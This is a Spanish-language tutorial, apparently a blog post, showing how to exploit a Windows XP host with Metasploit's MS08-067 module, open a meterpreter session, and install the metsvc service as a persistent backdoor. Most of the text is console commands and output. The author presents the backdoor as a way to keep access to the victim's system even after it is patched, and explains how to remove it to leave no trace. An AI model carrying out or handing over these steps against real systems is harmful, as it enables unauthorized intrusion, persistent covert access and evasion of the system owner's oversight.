Primero, necesitamos una sesión de meterpreter en el sistema remoto.
_ | | o _ _ _ _ _|_ __, , _ | | __ _|_ / |/ |/ | |/ | / | / _|/ _|/ / _| | | | |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/ /| | =[ metasploit v3.3.4-dev [core:3.3 api:1.0] + -- --=[ 489 exploits - 225 auxiliary + -- --=[ 192 payloads - 23 encoders - 8 nops =[ svn r8074 updated today (2010.01.05) msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 172.16.83.128 RHOST => 172.16.83.128 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set LHOST 172.16.83.1 LHOST => 172.16.83.1 msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 3 - lang:English [*] Selected Target: Windows XP SP3 English (NX) [*] Triggering the vulnerability... [*] Sending stage (723456 bytes) [*] Meterpreter session 3 opened (172.16.83.1:54745 -> 172.16.83.128:4444) meterpreter >
Una vez conseguida, ejecutamos metsrv, que instalará como servicio un servidor de meterpreter en el host remoto.
meterpreter > run metsvc [*] Creating a meterpreter service on port 31337 [*] Creating a temporary installation directory C:WINDOWSTEMPHdOFwlxzpobWuh... [*] >> Uploading metsrv.dll... [*] >> Uploading metsvc-server.exe... [*] >> Uploading metsvc.exe... [*] Starting the service... * Installing service metsvc * Starting service Service metsvc successfully installed.
Ahora, si queremos, podemos reiniciar el sistema remoto, aunque el servicio ya está corriendo.
meterpreter > reboot Rebooting... meterpreter >
Ahora, cuando se reinicie el host remoto, vamos a conectarnos al servicio de meterpreter que acabamos de instalar.
Para ello, usaremos el handler para que nos porte el exploit windows/metsvc_bind_tcp, lo configuraremos y nos conectaremos, como haré yo.
msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp PAYLOAD => windows/metsvc_bind_tcp msf exploit(handler) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/metsvc_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LPORT 4444 yes The local port RHOST no The target address Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > set LPORT 31337 LPORT => 31337 msf exploit(handler) > set RHOST 172.16.83.128 RHOST => 172.16.83.128 msf exploit(handler) > exploit [*] Starting the payload handler... [*] Started bind handler [*] Meterpreter session 1 opened (172.16.83.1:42050 -> 172.16.83.128:31337) meterpreter >
Y ya está! Esto nos viene bien por si el host remoto aplica un parche que corrija sus vulnerabilidades.
Aunque parchee el sistema, nosotros tendremos acceso a su sistema a través de ese backdoor.
Y si queremos desinstar el metsvc en el host remoto para no dejar rastro, tan sólo tenemos que ejecutar metsvc -r en nuestra sesión de meterpreter.
meterpreter > run metsvc -r [*] Removing the existing Meterpreter service [*] Creating a temporary installation directory C:WINDOWSTEMPQQqawIYOjLq... [*] >> Uploading metsvc.exe... [*] Stopping the service... * Stopping service metsvc * Removing service Service metsvc successfully removed. meterpreter >